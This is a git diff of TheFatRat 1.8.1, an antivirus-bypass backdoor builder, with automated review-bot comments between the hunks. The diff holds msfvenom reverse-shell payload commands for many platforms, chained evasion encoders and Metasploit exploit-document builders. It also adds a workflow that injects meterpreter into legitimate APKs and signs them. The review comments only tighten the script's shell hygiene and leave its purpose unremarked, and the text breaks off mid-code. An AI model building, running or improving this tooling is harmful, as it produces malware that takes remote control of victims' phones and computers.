diff --git a/CHANGELOG.md b/CHANGELOG.md index e8b2042..c011ed1 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -1,5 +1,9 @@ ## CHANGELOG +* v1.8.1 - added possibility to configure metasploit , backdoor-factory & searchsploit with manual inputs + +* - added more packages instalations needed for non-pentest distribution & some bugs fixed + * v1.8 - add file pumper in TFR * v1.8 - Backdoor with c program for meterpreter reverse_tcp * v1.8 - Metasploit staging protocol ( c program ) diff --git a/Dockerfile b/Dockerfile index df69df3..2798c9d 100644 --- a/Dockerfile +++ b/Dockerfile @@ -17,7 +17,20 @@ RUN echo 'APT::Get::Install-Recommends "false";' >> /etc/apt/apt.conf \ backdoor-factory \ monodevelop \ ruby \ - apache2 + apache2 \ + upx-ucl \ + xterm \ + gnome-terminal \ + default-jre \ + default-jdk \ + unzip \ + aapt \ + apktool \ + dex2jar \ + zlib1g-dev \ + libmagickwand-dev \ + imagemagick \ + zipalign WORKDIR /root/TheFatRat ADD . ./ diff --git a/README.md b/README.md index 33458a7..08ecf15 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ #TheFatRat ( Unit for bypass av ) -##Update: Version 1.8 +##Update: Version 1.8.1 ##Codename: Spark What is TheFatRat ?? @@ -87,7 +87,8 @@ And it's up & running. ## :heavy_exclamation_mark: Requirements -- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / Backbox / and another operating system ( linux ) +- A linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling + Cyborg / Parrot / Dracos / BackTrack / Backbox / Devuan and another operating system ( linux ) - Must install metasploit framework diff --git a/config/readme.md b/config/readme.md new file mode 100644 index 0000000..5df390d --- /dev/null +++ b/config/readme.md @@ -0,0 +1,4 @@ +----------------------------------------- +|Folder for FatRat configuration files .| +| Do Not Remove this file . | +----------------------------------------- 
diff --git a/fatrat b/fatrat index a2003df..d512242 100644 --- a/fatrat +++ b/fatrat @@ -22,23 +22,22 @@ white='\e[1;37m' red='\e[1;31m' yellow='\e[1;33m' BlueF='\e[1;34m' - - +path=`pwd` #Checking -[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; } +[[ `id -u` -eq 0 ]] || { echo -e $red "Must be root to run script"; exit 1; } resize -s 33 84 > /dev/null clear -file="config.path" +file="config/config.path" if [ -f "$file" ] then -msfconsole=`sed -n 5p config.path` -msfvenom=`sed -n 6p config.path` -backdoor=`sed -n 7p config.path` -searchsploit=`sed -n 8p config.path` +msfconsole=`sed -n 5p $file` +msfvenom=`sed -n 6p $file` +backdoor=`sed -n 7p $file` +searchsploit=`sed -n 8p $file` else - echo "Configuration file does not exists , run setup.sh first ." + echo "Configuration file does not exists , run setup.sh first ." exit 1 fi @@ -113,7 +112,7 @@ cat << ! # Some Variables ##################### path=`pwd` -Versi=1.8 +Versi=1.8.1 codename=Sparta OS=`uname` # distro=`awk '{print $1}' /etc/issue` @@ -135,7 +134,9 @@ out='output/ip.txt' pump='tools/pump.py' reverse1='temp/reverse1.c' stag='temp/stag.c' - +apkconfig=$path/config/apk.tmp +unzip=unzip +temp=$path/temp ################################################### # CTRL C ################################################### @@ -158,7 +159,7 @@ exit ######################### -#CHECK DEPENDICS +#CHECK DEPENDICIES ######################### echo -e $cyan" ____ _ _ _ " echo " / ___| |__ ___ ___| | _(_)_ __ __ _ " @@ -174,10 +175,10 @@ if [ $(id -u) != "0" ]; then echo [!]::[Check Dependencies] ; sleep 2 - echo [✔]::[Check User]: $USER ; - echo [✔]::[Distro]: $distro ; + echo [✔]::[Check User]: $USER ; + echo [✔]::[Distro]: $distro ; sleep 1 - echo [x]::[not root]: you need to be [root] to run this script.; + echo [x]::[not root]: you need to be [root] to run this script.; echo "" sleep 1 exit 
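Review bot: The tool commands are read by line number from `config/config.path`, a path relative to the current directory, and elsewhere in this diff they are expanded unquoted and run (`which $msfvenom`, `$msfvenom -p ...`) by a script that insists on being root. Whoever can write that file, or place a file of that name in the start directory, therefore chooses what runs as root. I would resolve the path from the script location, `file="$(dirname "$(readlink -f "$0")")/config/config.path"`, refuse a config that is not root-owned or is writable by others, and quote `"$file"` in the four `sed` calls. The powerfull.sh hunk repeats the same pattern, and the setup.sh hunk with `read -p "Path: " msfc` writes the typed path into this file without validation.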
@@ -187,8 +188,8 @@ else echo [!]::[Check Dependencies]: ; sleep 1 - echo [✔]::[Distro]: $distro ; - echo [✔]::[Check User]: $USER ; + echo [✔]::[Distro]: $distro ; + echo [✔]::[Check User]: $USER ; fi @@ -211,7 +212,7 @@ fi # check apache if exists which apache2 > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo [✔]::[Apache2 Server $distro ]: installation found!; + echo [✔]::[Apache2 Server $distro ]: installation found!; else echo [x]::[warning]:this script require apache2 to work ; @@ -251,12 +252,12 @@ sleep 2 # check if msfvenom exists which $msfvenom > /dev/null 2>&1 if [ "$?" -eq "0" ]; then - echo [✔]::[Msfvenom]: installation found!; + echo [✔]::[Msfvenom]: installation found!; else echo [x]::[warning]:this script require msfvenom installed to work ; echo "" - echo [!]::Run setup.sh to install metasploit-framework ; + echo [!]::Run setup.sh to install metasploit-framework ; sleep 3 exit 1 fi @@ -559,7 +560,7 @@ echo "" spinlong echo "" echo "" - $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf + $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f elf > output/$fira.elf echo -e "Shell Saved To output Folder " elif test $fatrat1 == '2' then 
@@ -574,7 +575,7 @@ echo "" spinlong echo "" echo "" - $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe + $msfvenom -p $payload LHOST=$yourip LPORT=$yourport -f raw -e x86/shikata_ga_nai -i 10 | $msfvenom -a x86 --platform windows -e x86/countdown -i 8 -f raw | $msfvenom -a x86 --platform windows -e x86/jmp_call_additive -i 1| $msfvenom -a x86 --platform windows -e x86/call4_dword_xor -i 1 | $msfvenom -a x86 --platform windows -e x86/shikata_ga_nai -i 1 -f exe -o output/$fira.exe echo -e "Shell Saved To output Folder " elif test $fatrat1 == '3' then @@ -589,7 +590,7 @@ echo "" spinlong echo "" echo "" - $msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk + $msfvenom -p android/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.apk echo -e "Shell Saved To output Folder " elif test $fatrat1 == '4' then @@ -604,7 +605,7 @@ echo "" spinlong echo "" echo "" - $msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho + $msfvenom -p osx/x86/shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f macho > output/$fira.macho echo -e "Shell Saved To outputFolder " elif test $fatrat1 == '5' then @@ -619,7 +620,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php + $msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php echo -e "Shell Saved To output Folder " elif test $fatrat1 == '6' then 
@@ -634,7 +635,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp + $msfvenom -p windows/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport -f asp > output/$fira.asp echo -e "Shell Saved To output Folder " elif test $fatrat1 == '7' then @@ -649,7 +650,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp + $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f raw > output/$fira.jsp echo -e "Shell Saved To output Folder " elif test $fatrat1 == '8' then @@ -664,7 +665,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war + $msfvenom -p java/jsp_shell_reverse_tcp LHOST=$yourip LPORT=$yourport -f war > output/$fira.war echo -e "Shell Saved To output Folder " elif test $fatrat1 == '9' then @@ -679,7 +680,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py + $msfvenom -p cmd/unix/reverse_python LHOST=$yourip LPORT=$yourport -f raw > output/$fira.py echo -e "Shell Saved To output Folder " elif test $fatrat1 == '10' then @@ -694,7 +695,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh + $msfvenom -p cmd/unix/reverse_bash LHOST=$yourip LPORT=$yourport -f raw > output/$fira.sh echo -e "Shell Saved To output Folder " elif test $fatrat1 == '11' then @@ -709,7 +710,7 @@ echo "" spinlong2 echo "" echo "" - $msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl + $msfvenom -p cmd/unix/reverse_perl LHOST=$yourip LPORT=$yourport -f raw > output/$fira.pl echo -e "Shell Saved To output Folder " elif test $fatrat1 == '12' 
@@ -733,9 +734,9 @@ echo "" gboor spinlong echo "" - xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1 + xterm -T " TheFatRat < DOC BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/ms12_027_mscomctl_bof; set payload $payloads ; set FILENAME $fira.doc; set lhost $yourip ; set lport $yourport; exploit; exit -y'" echo "" - mv ~/.msf4/local/$fira.doc $path/output/$fira.doc + mv ~/.msf4/local/$fira.doc $path/output/$fira.doc echo -e $okegreen"" echo -e $yellow" Backdoor doc Saved To output Folder " echo "" @@ -766,9 +767,9 @@ echo "" gboor spinlong echo "" - xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" > /dev/null 2>&1 + xterm -T " TheFatRat < RAR BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use exploit/windows/fileformat/winrar_name_spoofing; set payload $payloads; set FILENAME $fira; set SPOOF $fira2; set lhost $yourip; set lport $yourport; exploit; exit -y'" echo "" - mv ~/.msf4/local/$fira $path/output/$fira + mv ~/.msf4/local/$fira $path/output/$fira echo -e $okegreen"" echo -e $yellow" Backdoor Saved To output Folder " echo "" 
@@ -834,8 +835,8 @@ echo -e $okegreen" ============================================================ echo set LPORT $uservar >> "temp/meterpreter_linux.rc" echo set ExitOnSession false >> "temp/meterpreter_linux.rc" echo exploit -j >> "temp/meterpreter_linux.rc" - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" & - clear + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_linux.rc" + clear elif test $fatrat1 == '2' #Windows then rm temp/*.rc > /dev/null 2>&1 @@ -852,7 +853,7 @@ echo -e $okegreen" ============================================================ echo set AutoRunScript multi_console_command -rc $path/postexploit/$pe >> "temp/meterpreter_windows.rc" echo set ExitOnSession false >> "temp/meterpreter_windows.rc" echo exploit -j >> "temp/meterpreter_windows.rc" - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" & + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_windows.rc" clear elif test $fatrat1 == '3' #Mac then @@ -867,7 +868,7 @@ echo -e $okegreen" ============================================================ echo set LPORT $uservar >> "temp/meterpreter_mac.rc" echo set ExitOnSession false >> "temp/meterpreter_mac.rc" echo exploit -j >> "temp/meterpreter_mac.rc" - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" & + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc" clear elif test $fatrat1 == '4' #Android @@ -884,7 +885,7 @@ echo -e $okegreen" ============================================================ echo set LPORT $uservar >> "temp/meterpreter_android.rc" echo set ExitOnSession false >> "temp/meterpreter_android.rc" echo exploit -j >> "temp/meterpreter_android.rc" - xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" & + xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc" clear elif test $fatrat1 == '5' 
@@ -927,7 +928,12 @@ echo -e $okegreen"[ ]$red Embed a Metasploit Payload in an original . echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]" echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]" echo "" +echo "Cleaning Temp files" +rm -rf output/* +sleep 2 +echo "Done!" echo -e $okegreen"" +sleep 1 echo -ne " SET LHOST : ";tput sgr0 read yourip echo "" @@ -936,7 +942,22 @@ read yourport echo "" echo -ne $okegreen "Located Original Apk file for embed (example:$path/PE/instagram.apk) :" ;tput sgr0 read copyfile -cp $copyfile $path/output/fatrat.apk +cp $copyfile $path/output/fatrat.apk +apkt="$path/output/fatrat.apk" + +if [ ! -f $apkt ]; then + echo "[!] There was an error copying your APK to a temporary folder , make sure you wrote the right path " + read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key +menu + fi + +$unzip -l $apkt > /dev/null 2>&1 + rc=$? + if [ $rc != 0 ]; then + echo "[!] Original APK file specified is not valid" + read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key + menu + fi echo "" payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1 echo "" 
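Review bot: The added `rm -rf output/*` runs as root against a path relative to the directory the script was started from, and it deletes every earlier result in that folder before any input has been read. Anchoring and guarding it, `rm -rf -- "${path:?}/output/"*`, keeps the deletion inside the project tree and aborts if `path` is empty. The hunk at -946 rewrites `rm -rf $path/output/*`, which expands to `/output/*` when `$path` is unset, so the same guard applies there. A short comment saying that this step discards previous output would also help, since the "Cleaning Temp files" message does not make that obvious.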
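Review bot: `$copyfile` comes straight from `read` and is used unquoted in `cp $copyfile $path/output/fatrat.apk`, so a path with spaces or glob characters is split or expanded, and a value starting with `-` is parsed as a cp option, all as root. Quoting and ending option parsing fixes that: `cp -- "$copyfile" "$path/output/fatrat.apk"`, and likewise `[ ! -f "$apkt" ]` and `$unzip -l "$apkt"`. Separately, both new error branches call `menu` and then fall through once it returns, so the statements below still run against a missing or invalid file. A `return` after `menu`, or moving the remainder into an `else`, would stop that. The enclosing block starts and ends outside the hunk.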
@@ -946,16 +967,36 @@ spinlong gboor2 spinlong echo "" +sleep 1 +echo "Creating RAT payload with msfvenom" +$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/output/payload.apk +echo "Done !" +sleep 2 +echo "Starting the merging process of RAT with the APK you selected" echo "" +ruby $apkembed $path/output/fatrat.apk echo "" -echo "" -ruby $apkembed output/fatrat.apk -p $payload LHOST=$yourip LPORT=$yourport -echo "" -cp $path/output/output/fatrat_backdoored.apk backdoored/apkembed.apk -rm -rf $path/output/* -java -jar $bundle $cert $key $path/backdoored/apkembed.apk $path/output/Apk_embed_backdoor.apk -rm backdoored/apkembed.apk -echo -ne $okegreen" Your payload has been successfully embed with sign and is located here ( output folder ) " +echo "Merge completed of Payload with your APK" +sleep 2 +cp $path/output/fatrat_backdoored.apk $path/backdoored/apkembed.apk +echo "File copied with success to : $path/backdoored" +sleep 2 +echo "Removing temporary files from output" +sleep 2 +rm -rf $path/output/* +echo "Signing your APK file" +sleep 2 +java -jar $bundle $cert $key $path/backdoored/apkembed.apk Apk_embed_backdoor.apk +rm $path/backdoored/apkembed.apk +mv $path/Apk_embed_backdoor.apk $path/backdoored/output/ +outapk="$path/backdoored/output/Apk_embed_backdoor.apk" +if [ ! -f $outapk ]; then + echo "[!] APK Rat file was not found in : $path/backdoored/output/" + read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key +menu + fi +echo -ne $okegreen" Your payload has been successfully embed with sign and is located here : + $path/backdoored/output/Apk_embed_backdoor.apk" read loveyou echo clear @@ -1031,7 +1072,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo cat powershell_attack.txt sleep 2 rm unicorn.rc - mv powershell_attack.txt output/$fira.bat + mv powershell_attack.txt output/$fira.bat echo "" echo -e $okegreen"" echo -e "Backdoor Saved To output Folder " 
@@ -1199,7 +1240,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo echo " Wait for embed exe to pdf .... " xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1 echo "" - mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf + mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf rm unicorn.rc powershell_attack.txt echo -e $okegreen"" echo -e $yellow" Backdoor PDF Saved To output Folder " @@ -1506,7 +1547,7 @@ echo -e $red" Powershell$cyan Injection attacks on any$red Windows Platfo echo ' function();'>>$stag echo ' return 0;'>>$stag echo '}' >> $stag - $COMPILER $stag -o output/$fira.exe -lws2_32 + $COMPILER $stag -o output/$fira.exe -lws2_32 echo echo -e $yellow " [+]"$okegreen"Compiling Binary Done ";tput sgr0 rm $stag @@ -1916,7 +1957,7 @@ menu () { elif test $fatrat == '2' then chmod +x powerfull.sh - xterm -fa monaco -fs 13 -bg black ./powerfull.sh + xterm -fa monaco -fs 13 -bg black ./powerfull.sh elif test $fatrat == '3' then @@ -1936,7 +1977,7 @@ menu () { spinlong2 echo "" echo -e $okegreen"" - $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe + $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe echo -e "Shell Saved To /backdoored/output/ press any key to continue" read bebeku clear @@ -1956,7 +1997,7 @@ menu () { elif test $fatrat == '8' then - xterm -fa monaco -fs 13 -bg black -e "$msfconsole" + xterm -fa monaco -fs 13 -bg black -e "$msfconsole" elif test $fatrat == '9' then @@ -2114,7 +2155,7 @@ echo elif test $fatrat == '2' then chmod +x powerfull.sh - xterm -fa monaco -fs 13 -bg black ./powerfull.sh + xterm -fa monaco -fs 13 -bg black ./powerfull.sh elif test $fatrat == '3' then 
@@ -2134,7 +2175,7 @@ echo spinlong2 echo "" echo -e $okegreen"" - $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe + $backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$fira.exe echo -e "Shell Saved To /backdoored/output/ press any key to continue" read bebeku clear @@ -2154,7 +2195,7 @@ echo elif test $fatrat == '8' then - xterm -fa monaco -fs 13 -bg black -e "$msfconsole" + xterm -fa monaco -fs 13 -bg black -e "$msfconsole" elif test $fatrat == '9' then diff --git a/logs/readme.md b/logs/readme.md new file mode 100644 index 0000000..751a20c --- /dev/null +++ b/logs/readme.md @@ -0,0 +1,3 @@ +******************************************************************************* +* All TheFatRat logs will be stored in this folder , do not delete this file! * +******************************************************************************* diff --git a/powerfull.sh b/powerfull.sh index 8e41be4..3a6db04 100644 --- a/powerfull.sh +++ b/powerfull.sh @@ -1,11 +1,11 @@ #!/bin/bash -file="config.path" +file="config/config.path" if [ -f "$file" ] then -msfconsole=`sed -n 5p config.path` -msfvenom=`sed -n 6p config.path` -backdoor=`sed -n 7p config.path` -searchsploit=`sed -n 8p config.path` +msfconsole=`sed -n 5p $file` +msfvenom=`sed -n 6p $file` +backdoor=`sed -n 7p $file` +searchsploit=`sed -n 8p $file` else echo "Configuration file does not exists , run setup.sh first ." exit 1 diff --git a/setup.sh b/setup.sh index ad495c7..c2016ba 100644 --- a/setup.sh +++ b/setup.sh 
@@ -8,11 +8,19 @@ sleep 4s rm -f /etc/apt/sources.list mv /etc/apt/sources.list.fatrat /etc/apt/sources.list echo "Your Original repository list was recovered. ;) ..... beginning setup" +echo "" +echo "Cleaning previous repositories cache & updating your repository ." +sudo apt-get clean && apt-get update -y sleep 3s else echo "" -fi +fi +path=`pwd` +log=$path/logs/setup.log +config=$path/config/config.path +#Removing any previous setup log created +rm -f $log # setup.sh Author : Edo maland ( Screetsec ) # Install all dependencies nedded # configuration all file for fixing all problem @@ -20,7 +28,7 @@ fi #Check root dulu [[ `id -u` -eq 0 ]] || { echo -e "\e[31m Must be root to run script"; exit 1; } -resize -s 30 73 > /dev/null +resize -s 30 73 > /dev/null 2>&1 clear @@ -48,11 +56,16 @@ echo " [ ] Use this script to configure fatrat [ ]" echo " [ ] Install all dependencies [ ]" echo " [ ]=================================================[ ]"; echo "" - +touch $log +echo "------------------------------------------------------" >> $log +echo "| Tools paths configured in (setup.sh) for TheFatRat |" >> $log +echo "------------------------------------------------------" >> $log +echo " " >> $log #check if xterm is installed which xterm > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Xterm.............................[ found ]" +which xterm >> $log 2>&1 sleep 2 else echo "" @@ -62,12 +75,14 @@ sleep 2 sudo apt-get install xterm -y clear echo "[ ✔ ] Done installing .... " +which xterm >> $log 2>&1 fi #check if zenity its installed which zenity > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Zenity............................[ found ]" +which zenity >> $log 2>&1 sleep 2 else echo "" 
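Review bot: The new `sudo apt-get clean && apt-get update -y` and `rm -f $log` run before the `id -u` root check shown in the next hunk, so an unprivileged run gets as far as a sudo prompt and a failing `apt-get update` before being told it must be root. The line also mixes a `sudo` call with a bare one. I would move the root check to the top of the script and drop `sudo` here. `path` is taken from `pwd`, so the log and config land wherever the user happened to start the script. Deriving it from the script location and quoting the result, `rm -f -- "$log"`, avoids surprises with directories that contain spaces.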
@@ -77,18 +92,21 @@ sleep 2 echo "[ ! ] Installing zenity from your apt sources ]" xterm -T "☣ INSTALL ZENITY ☣" -geometry 100x30 -e "sudo apt-get install zenity -y" echo "[ ✔ ] Done installing .... " +which zenity >> $log 2>&1 fi # check if gcc exists which gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Gcc compiler......................[ found ]" +which gcc >> $log 2>&1 sleep 2 else echo "[ X ] gcc compiler -> not found ]" echo "[ ! ] Installing gcc from your apt sources ]" xterm -T "☣ INSTALL GCC COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install gcc -y" echo "[ ✔ ] Done installing .... " +which gcc >> $log 2>&1 sleep 2 fi @@ -96,12 +114,14 @@ fi which i586-mingw32msvc-gcc > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Mingw32 Compiler..................[ found ]" +which i586-mingw32msvc-gcc >> $log 2>&1 sleep 2 else echo "[ X ] mingw32 compiler -> not found ]" echo "[ ! ] Installing zenity from your apt sources ]" xterm -T "☣ INSTALL MINGW32 COMPILLER ☣" -geometry 100x30 -e "sudo apt-get install mingw32 -y" echo "[ ✔ ] Done installing .... " +which i586-mingw32msvc-gcc >> $log 2>&1 sleep 2 fi @@ -109,12 +129,14 @@ fi which monodevelop > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Monodevelop ......................[ found ]" +which monodevelop >> $log 2>&1 sleep 2 else echo "[ X ] Monodevelop -> not found ]" echo "[ ! ] Installing monodevelop from your apt sources ]" xterm -T "☣ INSTALL MONODEVELOP ☣" -geometry 100x30 -e "sudo apt-get install monodevelop -y" echo "[ ✔ ] Done installing ...." +which monodevelop >> $log 2>&1 sleep 2 fi 
@@ -122,12 +144,14 @@ fi which ruby > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Ruby .............................[ found ]" +which ruby >> $log 2>&1 sleep 2 else echo "[ X ] Ruby -> not found ]" echo "[ ! ] Installing ruby from your apt sources ]" xterm -T "☣ INSTALL RUBY ☣" -geometry 100x30 -e "sudo apt-get install ruby -y" echo "[ ✔ ] Done installing ...." +which ruby >> $log 2>&1 sleep 2 fi @@ -135,12 +159,14 @@ fi which apache2 > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Apache2 ..........................[ found ]" +which apache2 >> $log 2>&1 sleep 2 else echo "[ X ] Apache2 -> not found ]" echo "[ ! ] Installing apache2 from your apt sources ]" xterm -T "☣ INSTALL APACHE2 ☣" -geometry 100x30 -e "sudo apt-get install apache2 -y" echo "[ ✔ ] Done installing ...." +which apache2 >> $log 2>&1 sleep 2 fi @@ -150,12 +176,14 @@ fi which gnome-terminal > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] Gnome Terminal....................[ found ]" +which gnome-terminal >> $log 2>&1 sleep 2 else echo "[ X ] Gnome-terminal-> not found ]" echo "[ ! ] Installing gnome-terminal from your apt sources ]" xterm -T "☣ INSTALL GNOME-TERMINAL ☣" -geometry 100x30 -e "sudo apt-get install gnome-terminal -y" echo "[ ✔ ] Done installing ...." +which gnome-terminal >> $log 2>&1 sleep 2 fi 
@@ -163,12 +191,95 @@ fi which upx > /dev/null 2>&1 if [ "$?" -eq "0" ]; then echo "[ ✔ ] UPX Compressor....................[ found ]" +which upx >> $log 2>&1 sleep 2 else echo "[ X ] Upx compressor -> not found ]" echo "[ ! ] Installing upx-compressor from your apt sources ]" xterm -T "☣ INSTALL UPX COMPRESSOR ☣" -geometry 100x30 -e "sudo apt-get install upx-ucl -y" echo "[ ✔ ] Done installing ...." +which upx >> $log 2>&1 +sleep 2 +fi + +#Checking if keytool exists +which keytool > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Keytool (java)....................[ found ]" +which keytool >> $log 2>&1 +sleep 2 +else +echo "[ X ] Keytool (java) -> not found ]" +echo "[ ! ] Installing Java from your apt sources ]" +xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jre default-jdk -y " +echo "[ ✔ ] Done installing ...." +which keytool >> $log 2>&1 +sleep 2 +fi + +#Checking if Jarsigner exists +which jarsigner > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Jarsigner (java)..................[ found ]" +which jarsigner >> $log 2>&1 +sleep 2 +else +echo "[ X ] Jarsigner (java) -> not found ]" +echo "[ ! ] Installing Java from your apt sources ]" +xterm -T "☣ INSTALL JAVA ☣" -geometry 100x30 -e "sudo apt-get install default-jdk -y " +echo "[ ✔ ] Done installing ...." +which jarsigner >> $log 2>&1 +sleep 2 +fi + +#Checking if Unzip exists +which unzip > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Unzip.............................[ found ]" +which unzip >> $log 2>&1 +sleep 2 +else +echo "[ X ] Unzip -> not found ]" +echo "[ ! ] Installing Unzip from your apt sources ]" +xterm -T "☣ INSTALL UNZIP ☣" -geometry 100x30 -e "sudo apt-get install unzip -y " +echo "[ ✔ ] Done installing ...." +which unzip >> $log 2>&1 +sleep 2 +fi + +#Checking if Aapt exists +which aapt > /dev/null 2>&1 +if [ "$?" 
-eq "0" ]; then +echo "[ ✔ ] Aapt..............................[ found ]" +which aapt >> $log 2>&1 +sleep 2 +else +echo "[ X ] Aapt -> not found ]" +echo "[ ! ] Installing Aapt from your apt sources ]" +xterm -T "☣ INSTALL AAPT ☣" -geometry 100x30 -e "sudo apt-get install aapt -y " +echo "[ ✔ ] Done installing ...." +which aapt >> $log 2>&1 +sleep 2 +fi + +#Installing dependencies for Zipalign +echo "[ ! ] Installing Zipalign dependencies from your apt sources" +xterm -T "☣ INSTALL ZIPALING ☣" -geometry 100x30 -e "sudo apt-get install lib32stdc++6 lib32z1 lib32z1-dev -y " +echo "[ ✔ ] Done installing ...." +sleep 2 + +#Checking if Zipalign exists +which zipalign > /dev/null 2>&1 +if [ "$?" -eq "0" ]; then +echo "[ ✔ ] Zipalign..........................[ found ]" +which zipalign >> $log 2>&1 +sleep 2 +else +echo "[ X ] Zipalign -> not found ]" +echo "[ ! ] Installing Zipalign from your apt sources " +xterm -T "☣ INSTALL ZIPALIGN ☣" -geometry 100x30 -e "sudo apt-get install zipalign -y " +echo "[ ✔ ] Done installing ...." +which zipalign >> $log 2>&1 sleep 2 fi 
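Review bot: The keytool, jarsigner, unzip, aapt and zipalign blocks added here are five more copies of the same check, install and log sequence, as are the `which ... >> $log` additions in the earlier setup.sh hunks. Each copy prints "Done installing" without checking that the tool actually became available, so a failed install is only discovered later when fatrat runs. A small helper would remove the duplication and log the real outcome. The sketch below keeps the existing messages and the xterm install window. Separately, the window title for the lib32 packages reads "INSTALL ZIPALING" and should read "ZIPALIGN".

```shell
# Check for a tool, install its package(s) when missing, and record the resolved path.
ensure_tool() {
    local cmd="$1" pkgs="$2" label="$3"
    if ! command -v "$cmd" > /dev/null 2>&1; then
        echo "[ X ] $label -> not found"
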